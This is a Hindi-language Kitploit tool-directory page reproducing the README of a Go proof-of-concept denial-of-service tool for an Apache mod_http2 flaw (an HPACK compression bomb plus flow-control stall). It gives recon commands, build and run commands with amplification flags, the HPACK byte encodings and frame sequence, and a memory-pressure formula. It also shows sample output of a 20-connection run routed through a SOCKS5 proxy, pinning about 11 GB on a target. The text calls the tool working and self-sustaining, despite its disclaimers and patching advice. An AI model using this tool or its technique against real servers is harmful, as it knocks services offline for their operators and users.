Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC-CVE-2026-49975 — Apache mod_http2 में CVE-2026-49975 के लिए सुरक्षा शोध PoC: HTTP/2 HPACK कम्प्रेशन बम + फ़्लो-कंट्रोल होल्ड DoS | Kitploit
उपकरण/GitHubGitHub/naheeju/poc-cve-2026-49975
भेद्यता विश्लेषणशोषणवेब सुरक्षानेटवर्क सुरक्षा
GitHubnaheeju/poc-cve-2026-49975

POC-CVE-2026-49975

Apache mod_http2 में CVE-2026-49975 के लिए सुरक्षा शोध PoC: HTTP/2 HPACK कम्प्रेशन बम + फ़्लो-कंट्रोल होल्ड DoS

रिपॉजिटरी देखें
7घं 37मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Go Version Status Scope CVSS License

CVE-2026-49975

HTTP/2 बम — HPACK कम्प्रेशन बम + फ़्लो-कंट्रोल होल्ड PoC

naheeju द्वारा सुरक्षा अनुसंधान PoC


⚠️ यह एक कार्यशील, मेमोरी-एक्सहॉशन DoS टूल है — कोई खिलौना नहीं। यह ऐसी स्ट्रीम्स खोलता है जो लक्ष्य को मेमोरी आवंटित करने के लिए बाध्य करती हैं और HTTP/2 फ़्लो-कंट्रोल ट्रिक्स के माध्यम से उन्हें खुला रखता है। जब तक प्रक्रिया चल रही है, यह होल्ड करता रहता है और यदि सर्वर कनेक्शन गिरा देता है तो स्वचालित रूप से पुनः कनेक्ट हो जाता है — यह अपने आप नहीं रुकता। प्रभाव सीधे --threads, , और के साथ बढ़ता है। प्रक्रिया को रोकने (Ctrl+C) से होल्ड की गई स्ट्रीम्स मुक्त हो जाती हैं और सर्वर रिकवर हो जाता है, लेकिन डिफ़ॉल्ट संचालन में कुछ भी "सौम्य" नहीं है — प्रत्येक रन को लाइव-फ़ायर परीक्षण मानें।

--streams
--headers

1. अवलोकन

CVE-2026-49975 ("HTTP/2 बम") एक रिमोट, अनऑथेंटिकेटेड डिनायल-ऑफ़-सर्विस भेद्यता है जो Apache HTTP Server के mod_http2 मॉड्यूल को प्रभावित करती है। यह दो लंबे समय से ज्ञात HTTP/2 कमजोरियों को श्रृंखलाबद्ध करती है:

  1. HPACK बुककीपिंग बम — एक छोटा, HPACK-एन्कोडेड HTTP/2 अनुरोध कई Cookie हेडर फ़्रैगमेंट्स को LimitRequestFields के विरुद्ध गिने बिना मर्ज करने का कारण बनता है, जिससे सर्वर आंतरिक हेडर बुककीपिंग संरचनाओं के लिए बार-बार मेमोरी आवंटित करने के लिए बाध्य होता है।
  2. फ़्लो-कंट्रोल स्टॉल (Slowloris-शैली) — क्लाइंट लगभग शून्य फ़्लो-कंट्रोल विंडो की घोषणा करता है, प्रतिक्रिया संचरण में देरी करता है और प्रभावित स्ट्रीम(ों) को खुला रखता है, जो आवंटित मेमोरी को मुक्त होने से रोकता है।

परिणाम: एक मामूली कनेक्शन पर एक अकेला क्लाइंट जब तक स्ट्रीम खुली रहती है, तब तक लक्ष्य पर महत्वपूर्ण, निरंतर मेमोरी आवंटन को बाध्य कर सकता है। यह कार्यान्वयन दो पेलोड मोड का समर्थन करता है और आपके द्वारा कॉन्फ़िगर की गई समवर्तीता के साथ रैखिक रूप से स्केल करता है:

  • nginx मोड — HPACK डायनामिक टेबल में एक खाली x-bomb हेडर रखता है और बार-बार उसका पुनः संदर्भ देता है (प्रति संदर्भ ~70:1 प्रवर्धन)।
  • classic मोड — इसके बजाय एक अत्यधिक बड़ा cookie हेडर रखता है (प्रति संदर्भ ~4000:1 प्रवर्धन)।

प्रत्येक कनेक्शन प्रति स्ट्रीम रखे गए हेडर का हज़ारों बार पुनः संदर्भ देता है (--headers, डिफ़ॉल्ट 5000), प्रति कनेक्शन कई स्ट्रीम्स में (--streams, डिफ़ॉल्ट 10) और कई समानांतर कनेक्शनों में (--threads, डिफ़ॉल्ट 1)। यदि सर्वर कनेक्शन बंद कर देता है, तो टूल तुरंत पुनः कनेक्ट होता है और चलता रहता है जब तक मैन्युअल रूप से रोका न जाए — यह एक निरंतर-होल्ड लूप है, एकल वन-शॉट प्रोब नहीं।

अन्य प्रभावित स्टैक्स के लिए संबंधित पहचानकर्ता (इस रेपो द्वारा कार्यान्वित या परीक्षित नहीं):

  • Envoy → CVE-2026-47774
  • Microsoft IIS, Cloudflare Pingora → अलग से ट्रैक किए गए, यहाँ कोई CVE संदर्भित नहीं

पूर्णता के लिए, अंतर्निहित कमजोरी वर्ग का पूर्ण दायरा — "HTTP/2 बम" तकनीक (HPACK कम्प्रेशन बम + फ़्लो-कंट्रोल होल्ड) Apache से परे कई सर्वर कार्यान्वयनों को प्रभावित करती है। यह रेपो केवल Apache मामले को कार्यान्वित और परीक्षित करता है; बाकी इसलिए शामिल हैं ताकि पाठक व्यापक वर्ग को समझ सकें, इसलिए नहीं कि यह PoC उन्हें प्रयोग करता है:

कार्यान्वयनस्थितिइस PoC में कार्यान्वित?
Apache HTTP Server mod_http2httpd 2.4.68 (2026-06-08) में ठीक किया गयाहाँ — यह रेपो
nginx1.29.8 में ठीक किया गयानहीं
Envoyअलग से ट्रैक किया गयानहीं
Microsoft IISअलग से ट्रैक किया गयानहीं
Cloudflare Pingoraअलग से ट्रैक किया गयानहीं
CVECVE-2026-49975
CWECWE-789 (अत्यधिक आकार मान के साथ मेमोरी आवंटन, NVD/CVE.org के अनुसार); कुछ विक्रेताओं द्वारा CWE-409 (अत्यधिक संपीड़ित डेटा का अनुचित प्रबंधन) के रूप में भी ट्रैक किया गया
CVSS7.5 (उच्च) — CVSS v3.1, केवल-उपलब्धता वेक्टर (NVD के अनुसार)। Apache की स्वयं की सलाह इसे मध्यम दर्जा देती है।
प्रभावित घटकApache HTTP Server mod_http2
भेद्य संस्करणApache httpd 2.4.17 ≤ संस्करण ≤ 2.4.67 (डिफ़ॉल्ट HTTP/2 कॉन्फ़िग)
इसमें ठीक किया गयाApache HTTP Server 2.4.68 (2026-06-08 को जारी)। अंतर्निहित फ़िक्स 2026-05-27 को mod_h2 में अपस्ट्रीम लैंड हुआ, 2026-06-02 को httpd 2.4.x ब्रांच में मर्ज किया गया, 2.4.68 रिलीज़ में भेजा गया।
हमले का प्रकारडिनायल ऑफ़ सर्विस — मेमोरी एक्सहॉशन (केवल उपलब्धता)
प्रमाणीकरण आवश्यकनहीं
डेटा एक्सपोज़र / RCEकोई नहीं — यह केवल उपलब्धता-प्रभाव है
ज्ञात शोषितवर्तमान में ट्रैक किए गए स्रोतों द्वारा जंगल में ज्ञात-शोषित के रूप में चिह्नित नहीं।

संदर्भ (प्राथमिक स्रोत — सभी दावों को स्वतंत्र रूप से सत्यापित करें):

  • CVE रिकॉर्ड: https://www.cve.org/CVERecord?id=CVE-2026-49975
  • NVD प्रविष्टि: https://nvd.nist.gov/vuln/detail/CVE-2026-49975
  • Apache सलाह / भेद्यताओं की सूची: https://httpd.apache.org/security/vulnerabilities_24.html
  • Apache 2.4.68 चेंजलॉग (फ़िक्स कमिट संदर्भ): https://dlcdn.apache.org/httpd/CHANGES_2.4.68
  • मूल खोज राइटअप: https://blog.calif.io/p/codex-discovered-a-hidden-http2-bomb

2. इस रिपॉज़िटरी का दायरा

इस रिपॉज़िटरी में शामिल है:

  • एक न्यूनतम PoC स्क्रिप्ट जो उस लक्ष्य के विरुद्ध होल्ड-ओनली HPACK बम व्यवहार को पुन: उत्पन्न करती है जिसे परीक्षण करने के लिए आप अधिकृत हैं।
  • यह README, जो भेद्यता, प्रकटीकरण समयरेखा, और सुरक्षित-उपयोग की शर्तों का दस्तावेज़ीकरण करता है।

इस रिपॉज़िटरी में शामिल नहीं है:

  • भेद्य होस्ट्स के लिए इंटरनेट स्कैन करने का कोई स्वचालन।
  • कोई फ़्लडिंग/DoS-सस्टेन लॉजिक, समवर्तीता रैंप-अप, या क्रेडेंशियल/लक्ष्य सूचियाँ।
  • डिफ़ॉल्ट रूप से किसी विशिष्ट लाइव सिस्टम को लक्षित करने वाला कोई कोड। लक्ष्य ऑपरेटर द्वारा स्पष्ट रूप से प्रदान किया जाना चाहिए।

3. ⚖️ कानूनी और नैतिक सूचना

कुछ और करने से पहले इसे पढ़ें।

  • यह PoC सख्ती से शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान उद्देश्यों के लिए प्रकाशित है — ऑपरेटरों को उनके स्वयं के एक्सपोज़र को सत्यापित करने में मदद करने और पहले से ही प्रकट, पहले से ही पैच की गई भेद्यता के सार्वजनिक रिकॉर्ड का समर्थन करने के लिए।
  • किसी भी ऐसे लक्ष्य के विरुद्ध इसे चलाने से पहले आपके पास सिस्टम स्वामी से स्पष्ट, प्रलेखित प्राधिकरण होना चाहिए जो आपका अपना बुनियादी ढाँचा नहीं है या ऐसा सिस्टम नहीं है जिसका परीक्षण करने के लिए आप संविदात्मक/कानूनी रूप से अधिकृत हैं (जैसे, हस्ताक्षरित पेंटेस्ट एंगेजमेंट, बग बाउंटी स्कोप, या लिखित अनुमति)।
  • उन सिस्टमों के विरुद्ध यह PoC चलाना जो आपके नहीं हैं या जिनका परीक्षण करने के लिए आपके पास प्राधिकरण नहीं है — जिनमें सरकारी एजेंसियाँ, कानून प्रवर्तन, महत्वपूर्ण बुनियादी ढाँचा, या कोई भी तृतीय-पक्ष उत्पादन प्रणाली शामिल हैं लेकिन इन्हीं तक सीमित नहीं — अनुमति के बिना अधिकांश न्यायक्षेत्रों में अवैध है (इंडोनेशिया में, यह UU ITE के अंतर्गत आता है) और अन्यत्र आपराधिक अपराध हो सकता है।
  • इस रिपॉज़िटरी के लेखक:
    • इस कोड के दुरुपयोग के लिए कोई ज़िम्मेदारी नहीं लेते।
    • बिना प्राधिकरण के किसी भी सिस्टम को बाधित करने, गिराने, या सेवा से वंचित करने के लिए इस PoC का उपयोग करने का समर्थन नहीं करते।
    • यह कोड जैसा है वैसा प्रदान करते हैं, किसी भी प्रकार की वारंटी के बिना।
  • यदि आप एक विक्रेता, एजेंसी, या सिस्टम ऑपरेटर हैं जिसने यह रिपॉज़िटरी इसलिए पाई क्योंकि आपके सिस्टम का परीक्षण किया गया था: यह कैसे रिपोर्ट किया गया और किसे, इसके लिए अनुभाग 6 — प्रकटीकरण समयरेखा देखें।

इस रिपॉज़िटरी में किसी भी कोड को डाउनलोड, क्लोन, या निष्पादित करके, आप सहमत हैं कि आप यह सुनिश्चित करने के लिए पूरी तरह से ज़िम्मेदार हैं कि आपके पास उचित प्राधिकरण है, और आप इसके अपने उपयोग के लिए पूर्ण कानूनी ज़िम्मेदारी स्वीकार करते हैं।


4. रेकॉन विधि

CVE-2026-49975 केवल उस लक्ष्य पर लागू होता है जो अनुभाग 1 में दोनों मानदंडों को पूरा करता है — HTTP/2 पर पहुँचने योग्य और रेंज में एक भेद्य mod_http2 संस्करण चला रहा हो (2.4.17 ≤ संस्करण ≤ 2.4.67, डिफ़ॉल्ट कॉन्फ़िग)। लक्ष्य के HTTPS पोर्ट के विरुद्ध एक सादा curl -vkI दोनों की जाँच के लिए पर्याप्त है — किसी स्कैनर या अतिरिक्त फ़्लैग की आवश्यकता नहीं:

root@kitploit:~
curl -vkI https://<target>

आउटपुट में क्या देखें:

  • ALPN: server accepted h2 — सर्वर ने इस कनेक्शन के लिए HTTP/2 पर बातचीत की। यह CVE-2026-49975 की पूर्व शर्त है, क्योंकि बग mod_http2 में रहता है; जिस सर्वर ने यहाँ कभी h2 स्वीकार नहीं किया वह उम्मीदवार नहीं है।
  • Server प्रतिक्रिया हेडर (HEAD प्रतिक्रिया हेडर प्रिंट होने पर दिखाई देता है, -v आउटपुट में नीचे) — यह वही है जो अनुभाग 1 में भेद्य रेंज के विरुद्ध वास्तविक Apache/mod_http2 संस्करण की पुष्टि या खंडन करता है। अकेले ALPN स्वीकृति संस्करण की पुष्टि नहीं करती — उसके लिए अभी भी Server हेडर या समकक्ष बैनर जाँच की आवश्यकता है।

इस रेपो में रेकॉन के लिए इससे आगे कुछ भी उपयोग नहीं किया जाता — कोई सक्रिय शोषण ट्रैफ़िक नहीं, कोई भेद्यता स्कैनर नहीं, कोई पोर्ट स्वीप नहीं।


5. आवश्यकताएँ

  • रनटाइम: Go 1.26+ (मॉड्यूल: cve202649975)
  • निर्भरताएँ: golang.org/x/net v0.59.0 (go build के माध्यम से स्वचालित रूप से हल)
  • नेटवर्क पहुँच: निर्दिष्ट पोर्ट पर अधिकृत लक्ष्य तक सीधी TCP पहुँच (डिफ़ॉल्ट 443, डिफ़ॉल्ट रूप से TLS/h2; plaintext h2c के लिए --no-ssl)
  • वैकल्पिक: proxychains4 — यदि बाइनरी proxychains4 के अंतर्गत लॉन्च की जाती है, तो यह LD_PRELOAD रैपर का पता लगाती है, वही proxychains4.conf पढ़ती है, और अपने स्वयं के कनेक्शनों को उस SOCKS5 प्रॉक्सी के माध्यम से रूट करती है (रिमोट DNS रिज़ॉल्यूशन) — उपयोगी जब किसी एंगेजमेंट के दायरे के लिए विशिष्ट एग्रेस पथ से परीक्षण की आवश्यकता हो
  • अनुमतियाँ: परीक्षण किए जा रहे लक्ष्य के लिए लिखित प्राधिकरण / एंगेजमेंट लेटर

6. प्रकटीकरण समयरेखा

CVE-2026-49975 की सार्वजनिक समयरेखा: Apache को 2026-05-26 को रिपोर्ट किया गया; फ़िक्स 2026-05-27 को mod_h2 में अपस्ट्रीम लैंड हुआ; 2026-06-02 को httpd 2.4.x ब्रांच में मर्ज किया गया; Apache HTTP Server 2.4.68 2026-06-08 को जारी किया गया।


7. उपयोग

इसे केवल उस लक्ष्य के विरुद्ध चलाएँ जिसका परीक्षण करने के लिए आप स्पष्ट रूप से अधिकृत हैं। कोई अंतर्निहित अवधि सीमा या सेफ़-मोड नहीं है — यह कितनी देर चलता है और किस समवर्तीता पर, इसके लिए आप ज़िम्मेदार हैं।

बिल्ड:

root@kitploit:~
go build -o dos ./cmd
# or: sudo install -m 0755 dos /usr/local/bin/dos   (see build.sh)

रन:

root@kitploit:~
./dos <target> <port> [flags]
फ़्लैगडिफ़ॉल्टविवरण
--threads N1समानांतर कनेक्शन
--streams N10प्रति कनेक्शन खोली गई स्ट्रीम्स
--headers N5000प्रति स्ट्रीम HPACK डायनामिक-टेबल संदर्भ (प्रवर्धन चालक)
--mode nginx|classicnginxnginx = खाली-हेडर बुककीपिंग बम (~70:1); classic = फैट-कुकी बम (~4000:1, Apache mod_http2 Cookie-मर्जिंग तंत्र से मेल खाता है जिसके लिए यह CVE ट्रैक किया गया है)
--no-sslबंदTLS के बजाय plaintext h2c का उपयोग करें

उदाहरण, न्यूनतम अधिकृत लैब परीक्षण:

root@kitploit:~
./dos lab-target.internal 443 --threads 1 --streams 5 --headers 1000 --mode nginx

अपेक्षित व्यवहार:

  • कुछ भी भेजने से पहले एक प्री-फ़्लाइट सारांश प्रिंट करता है (लक्ष्य, मोड, कनेक्शन/स्ट्रीम गणना, अनुमानित सर्वर-साइड मेमोरी)।
  • 1-बाइट WINDOW_UPDATE ड्रिप्स और आवधिक पिंग्स के साथ स्ट्रीम्स को खुला रखता है; यदि सर्वर कनेक्शन बंद कर देता है तो स्वतः पुनः कनेक्ट होता है और दोहराता है।
  • केवल तब रुकता है जब आप Ctrl+C / SIGTERM भेजते हैं — तदनुसार अपनी परीक्षण विंडो की योजना बनाएँ और लक्ष्य की मेमोरी की वास्तविक समय में निगरानी करें।
  • अनुशंसित: किसी भी अधिकृत उत्पादन परीक्षण से पहले कम --streams/--headers के साथ स्टेजिंग/लैब वातावरण के विरुद्ध सत्यापित करें, और लक्ष्य सेवा के लिए रोलबैक/रीस्टार्ट योजना तैयार रखें।

7a. RAM दबाव अनुमान

इस टूल के दो मोड के लिए मोटा सर्वर-साइड मेमोरी सूत्र (केवल Apache mod_http2 — nginx/classic प्रवर्धन अनुपात से कैसे मैप होते हैं, इसके लिए अनुभाग 1 देखें):

root@kitploit:~
total_streams   = threads × streams
server_ram_MB   ≈ total_streams × headers × amplification_bytes / 1024²

# nginx mode (~70 bytes/ref), defaults (threads=1, streams=10, headers=5000):
#   1 × 10 × 5000 × 70 / 1024²  ≈ 3.3 MB held

# classic mode (~4000 bytes/ref), defaults:
#   1 × 10 × 5000 × 4000 / 1024² ≈ 190 MB held

threads/streams/headers को बढ़ाएँ और संख्या रैखिक रूप से बढ़ती है — यही कारण है कि किसी भी उत्पादन-दायरे के रन से पहले एक अधिकृत लैब परीक्षण कम से शुरू होना चाहिए (अनुभाग 7 देखें)।


7b. तकनीकी विवरण

यह उस तंत्र का दस्तावेज़ीकरण करता है जिसे यह विशिष्ट PoC Apache mod_http2 के विरुद्ध कार्यान्वित करता है — यह अन्य सर्वर कार्यान्वयनों तक विस्तारित नहीं होता, जो इस रिपॉज़िटरी के दायरे से बाहर हैं (अनुभाग 2 देखें)।

HPACK डायनामिक-टेबल सीड (इंक्रीमेंटल इंडेक्सिंग, इंडेक्स 62 पर प्रविष्टि जोड़ता है):

root@kitploit:~
0x40 | name_len | name | value_len | value
= 0x40 0x06 "x-bomb" 0x00              (nginx-mode seed: empty value)

उस प्रविष्टि का इंडेक्स्ड संदर्भ (प्रत्येक 1 बाइट, --headers बार दोहराया गया):

root@kitploit:~
0x80 | 62 = 0xbe

प्रति कनेक्शन HTTP/2 फ़्रेम अनुक्रम:

root@kitploit:~
Client → Server:
  PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n        (connection preface)
  SETTINGS [INITIAL_WINDOW_SIZE=0]         (flow-control stall setup)
  SETTINGS ACK                             (after reading server SETTINGS)
  HEADERS [stream 1]  ← HPACK bomb payload
  HEADERS [stream 3]  ← HPACK bomb payload
  ...                                      (up to --streams per connection)
  WINDOW_UPDATE(1) per stream, periodically   (keeps the stall alive)

वायर लागत छोटी और प्रति स्ट्रीम अधिकतर निश्चित है (सीड के लिए कुछ बाइट्स + प्रति संदर्भ 1 बाइट); सर्वर-साइड आवंटन वही है जो असमान रूप से बढ़ता है — यही अंतर भेद्यता है।


7c. उदाहरण आउटपुट

एक अधिकृत लैब रन से आउटपुट, classic मोड, 20 कनेक्शन × 30 स्ट्रीम्स/कॉन, 5000 HPACK रेफ़्स/स्ट्रीम, proxychains के माध्यम से रूट किया गया:

root@kitploit:~
proxychains4 dos domain.com 443 --mode classic --threads 20 --streams 30 --headers 5000
root@kitploit:~
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17


 ██╗  ██╗██████╗     ██████╗  ██████╗ ███╗   ███╗██████╗
 ██║  ██║╚════██╗    ██╔══██╗██╔═══██╗████╗ ████║██╔══██╗
 ███████║ █████╔╝    ██████╔╝██║   ██║██╔████╔██║██████╔╝
 ██╔══██║██╔═══╝     ██╔══██╗██║   ██║██║╚██╔╝██║██╔══██╗
 ██║  ██║███████╗    ██████╔╝╚██████╔╝██║ ╚═╝ ██║██████╔╝
 ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝     ╚═╝╚═════╝

  CVE-2026-49975  —  HTTP/2 Bomb PoC  (HPACK bomb + flow-control hold)
  Go PoC by naheeju  ·  originally discovered by Calif.IO  ·  authorized testing only
──────────────────────────────────────────────────────────────────
  Run configuration
  Target           domain.com:443
  Mode             classic (~4000:1 amplification)
  Connections      20
  Streams/conn     30
  Total streams    600
  HPACK refs/str   5000
  Est. server RAM  ~11444 MB
  Proxychains      yes — SOCKS5 127.0.0.1:9050 (remote DNS, no leak)
──────────────────────────────────────────────────────────────────
  [~] Opening connection #1...
  ...
  [+] 30 streams open | ~572 MB pinned on server | holding...
  [+] 30 streams open | ~572 MB pinned on server | holding...
  ... (one line per connection as it finishes opening its 30 streams)

प्रत्येक कनेक्शन स्ट्रीम्स खोलते समय स्वतंत्र रूप से अपना स्थानीय RAM योगदान रिपोर्ट करता है (इन सेटिंग्स पर प्रति कनेक्शन ~572 MB); प्री-फ़्लाइट Est. server RAM आंकड़ा सभी 20 कनेक्शनों में कुल योग है (~11.4 GB) जब प्रत्येक कनेक्शन पूरी तरह से खुला और होल्ड कर रहा हो।

ऊपर domain.com एक प्लेसहोल्डर है — अपने स्वयं के रन का दस्तावेज़ीकरण करते समय इसे अपने वास्तविक अधिकृत लक्ष्य से बदलें, और यदि एंगेजमेंट गोपनीय है तो इसे रिडैक्ट करें।


8. उपचार

  • Apache HTTP Server: httpd 2.4.68 या बाद के संस्करण में अपग्रेड करें (यह वह रिलीज़ है जिसमें फ़िक्स शामिल है)।
  • यदि तत्काल पैचिंग संभव नहीं है:
    • LimitRequestFields को रूढ़िवादी रूप से सेट करें और हेडर-मर्ज व्यवहार की निगरानी करें।
    • पैच होने तक प्रभावित लिसनर पर HTTP/2 अक्षम करने पर विचार करें।
    • सेवा को रिवर्स प्रॉक्सी/WAF के साथ फ्रंट करें जो कठोर हेडर-गणना कैप लागू करता हो।
  • उपचार के बाद पुनः परीक्षण करें ताकि पुष्टि हो सके कि होल्ड-एंड-रिलीज़ व्यवहार अब निरंतर मेमोरी वृद्धि का कारण नहीं बनता।

9. श्रेय / एट्रिब्यूशन

**मूल भेद्यता खोज

टूल डाउनलोड करें